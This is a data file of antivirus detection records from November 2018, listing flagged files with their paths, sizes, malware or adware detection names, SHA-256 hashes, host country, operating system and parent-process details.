  Row(detection=Row(filename='bwlock.exe', filepath='D:\\MyOldCompanies\\AStarcreationsAblage\\OLD FILES\\temp\\Myfiles\\Apps\\带宽锁破解版\\bwlock.exe', filesize=256000, name='TR/Agent.292352.100.#M1.#R1'), hash='d67241917a5151c675747260f544ec20ee79d35f8176f0887ac35937ae6ab2e9', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T02:21:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T10:13:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-164950-23da8af7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d37b11d1\\AVSCAN-20181103-164922-1EB2D974\\AVSCAN-20181103-164950-23DA8AF7', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:49:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=6912000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4e5c74d6ebccaed2b7d4db4484713fdba97f0f30c309683170c340d6d050f650', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T17:41:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='F:\\FOTO_FOTO\\2003\\Foto_dll\\setup.exe', filesize=640000, name='W32/Ramnit.C.#M1.#R1'), hash='6456ef46bc46d4476ff0889915def842ffec36d62ab7d42b60ca35637ca9280b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T20:23:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-040420-9f8de1c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e64da3d\\AVSCAN-20181104-040337-5F888003\\AVSCAN-20181104-040420-9F8DE1C4', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:04:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T22:08:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='project rubby 2.983.exe', filepath='C:\\Users\\X\\Music\\Project RuBBy 2.983.exe', filesize=320000, name='HEUR/AGEN.1015984.#M1.#R1'), hash='59c825e3e530f177f11965667c14361d385dfd53ae02730bd73b1c63e29bde59', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:34:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ds.exe', filepath='D:\\العاب حديثة\\حرب الفضاء\\DemonStarSM1_Shareware\\ds.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='3b03d62ccf2a2b8be6357b9309b4f185db9d737882970f9516c0edb87855e2d6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:11:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{9899B8B5-C656-4816-903C-29C4185BF674}\\setup.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='8c2da0482680dbd488a83bff78066b4652194f51d3dd57a5e74b5600c6e66904', metadata=Row(cmdline='\\\\\\/F \\\\\\/T \\\\\\/R', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wbem\\WMIADAP.exe', parentsize=115200, timestamp='2018-11-04T00:36:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup337.exe', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\10xyf3kskkc\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:20:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='.spotlight-v100.exe', filepath='D:\\.Spotlight-V100.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:23:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00001245', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp00001245', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T15:49:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T09:46:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setpmdefault.exe', filepath='C:\\xampp\\MercuryMail\\setpmdefault.exe', filesize=504000, name='W32/Jeefo.A.#M1.#R1'), hash='bad6eed724f01f67697943742ccecce77567d689318d8372e75f5f7229937cc0', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:C7SauQ2RaUSQisjm.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T02:48:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102350-b8d19971', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_506666b0\\AVSCAN-20181104-102311-B272E1FD\\AVSCAN-20181104-102350-B8D19971', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:23:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-191331-e5514f9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc727c94\\AVSCAN-20181104-190515-975C53E3\\AVSCAN-20181104-191331-E5514F9F', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:13:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:19:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='iocb637bf83-254a-1441-9ef6-9538336139e2', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\iocB637BF83-254A-1441-9EF6-9538336139E2', filesize=372000, name='TR/Dropper.Gen.#M300.#R2295'), hash='a97f619197743a38e1c86adadc9762d8ce2fe76050a622b3e8f6ba94d5952929', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T11:31:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:29:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T02:10:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:49:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-141046-7f99b282', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-140941-D691FF95\\AVSCAN-20181102-141046-7F99B282', filesize=192000, name='TR/AD.Bulta.Y.#M1.#R1'), hash='e3786ecd97f36eb1160b9eb50df42a58590d307c4b5e962bc7711bab4f8e7882', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:10:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140913-362975bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1407a8c\\AVSCAN-20181102-140846-3337120A\\AVSCAN-20181102-140913-362975BB', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:09:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0016764.exe', filepath='\\\\?\\L:\\System Volume Information\\_restore{AE0778D3-AEE6-4B14-9393-AA69173A7867}\\RP27\\A0016764.exe', filesize=9216000, name='TR/Crypt.XPACK.Gen3.#M300.#R200067'), hash='eb21f4c16ca57e090d02fe67401457f950f02b3a724d649cdc87c52237da1df4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:15:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='reparabase.exe', filepath='\\\\atlas\\human\\reparabase.exe', filesize=192000, name='W32/Neshta.A.#M1.#R1'), hash='7f231fd0ec9c3fce28d6e473df9e6bfc6fb16f255a0eb067bdad54312df6de27', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T12:45:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091711-27131abe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-091711-27131ABE', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='a2cff514bdff1c3a9e1e98222d19a4fccf8cd7e90943fd09fd0789a2f4109255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:19:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='n.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\SystemMonitor\\n.dll', filesize=9060000, name='PUA/PUA/CPUGuardian.#M1.#R1'), hash='ca7a812237ef6c287bb44e5729273694e0d9108a890fc1f1271589c3d3d335e2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:47:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.vir', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\PortableApps.com\\MsiExEc64.VIR', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:14:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='skypebrowserhost.exe', filepath='C:\\Program Files (x86)\\Skype\\Browser\\SkypeBrowserHost.exe', filesize=316000, name='W32/Jeefo.A.#M1.#R1'), hash='d71e41ff47dfee3dae7e2ad033dc2f83ebf992acf4d0c5ca531c84e6c84b1f5d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:30:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nfemykxv.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\nFEMykXV.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b5f2e5f74bda2ca78b234d8e0fcffe8978cbc007176f7d46392df9b2ba00ede6.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B5F2E5F74BDA2CA78B234D8E0FCFFE8978CBC007176F7D46392DF9B2BA00EDE6.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b5f2e5f74bda2ca78b234d8e0fcffe8978cbc007176f7d46392df9b2ba00ede6', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:51:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083050-b29e39bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083050-B29E39BB', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144937-3307efb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9367480\\AVSCAN-20181102-090433-6F0A8272\\AVSCAN-20181102-144937-3307EFB1', filesize=1020000, name='PUA/MyPCBackup.#M1.#R1'), hash='d55b192248c695cc763c8c5bd5a3d40aa91842a57756cc2ab3150227bcd41030', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='c6b098b6-88c4-0178-033e-196b1627042d.exe', filepath='F:\\{82665687-ef81-6ada-e7e3-620b245aa317}\\c6b098b6-88c4-0178-033e-196b1627042d.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='c960e9e65998fdf3253b52896d66876a438a3908edfa6868d9df546f003c8f32', metadata=Row(cmdline='\\\\\\/c \\\\\\"{82665687-ef81-6ada-e7e3-620b245aa317}\\\\\\\\c6b098b6-88c4-0178-033e-196b1627042d.exe \'NOTIFICACION INQUILINA.docx\'\\\\\\"', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=302592, timestamp='2018-11-02T13:55:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='958964170392e196874dd614bfbed8d47b1120a5dd494de5f86b4f84ac4d7725', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\958964170392E196874DD614BFBED8D47B1120A5DD494DE5F86B4F84AC4D7725', filesize=832000, name='HEUR/AGEN.1003642.#M1.#R1'), hash='958964170392e196874dd614bfbed8d47b1120a5dd494de5f86b4f84ac4d7725', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:28:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081352-30803ade', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081352-30803ADE', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:13:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-214116-15c9fe96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_909b2c74\\AVSCAN-20181102-214104-137AE382\\AVSCAN-20181102-214116-15C9FE96', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='cd19a1613937f7a5122a4248ddab7e2efb80d8b5ce073e75d8845bfad91163e7', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:43:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131753-31d084cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3595c44b\\AVSCAN-20181102-131631-285D853F\\AVSCAN-20181102-131753-31D084CD', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tthzqseeihm\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541083803.5bdb129b71b56', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Free\\225392171.exe', parentsize=671232, timestamp='2018-11-02T05:51:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\zgfufml3qjn\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:04:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:31:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:26:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-231749-f22ceb7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e0dee616\\AVSCAN-20181102-231629-E7E58321\\AVSCAN-20181102-231749-F22CEB7E', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='c2621af26e54406adb55593c8ee2b80af6fef0eef053dd1c891def234c78d82c', metadata=Row(cmdline=None, country='SI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='volumes.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\VOLUMES\\VOLUMES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='a905fb774a572a4570672938a60dc4ea75031cc40c0d4f92c6f4dac8a9800688', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nhq5j0cok2z\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Desktop\\\\\\\\mbar\\\\\\"     ', country='DZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\mbar\\mbar.exe', parentsize=302544, timestamp='2018-11-02T07:11:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='frame_6.htm', filepath='h:\\program files\\epson\\creativity suite\\easy photo print\\help\\_en_gb\\FRAME_6.HTM', filesize=456000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='93bb3b0a50654f73a9da71b09a143d244c0d0ac9d6154f6bcf0d9ff9197fdf35', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:16:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updane.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\45B692~1\\Updane.exe', filesize=2112000, name='Adware/DealPly.ac5c83.#M1.#R1'), hash='ac5c83defcbae3b71003b2a6d2374ff8769681328f358a7abd7f5a5c678ea86f', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:24:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='C:\\Users\\X\\Downloads\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T14:17:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~se8bcc.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~se8BCC.tmp', filesize=832000, name='TR/Snarasite.ME.15.#M1.#R1'), hash='fea6e6814f6c07f0cbc5e609755c7131cf91ccff7843eb7ad6653c8c99b9d2e8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:28:03Z'), dt=datetime.date(2018, 11, 2)),
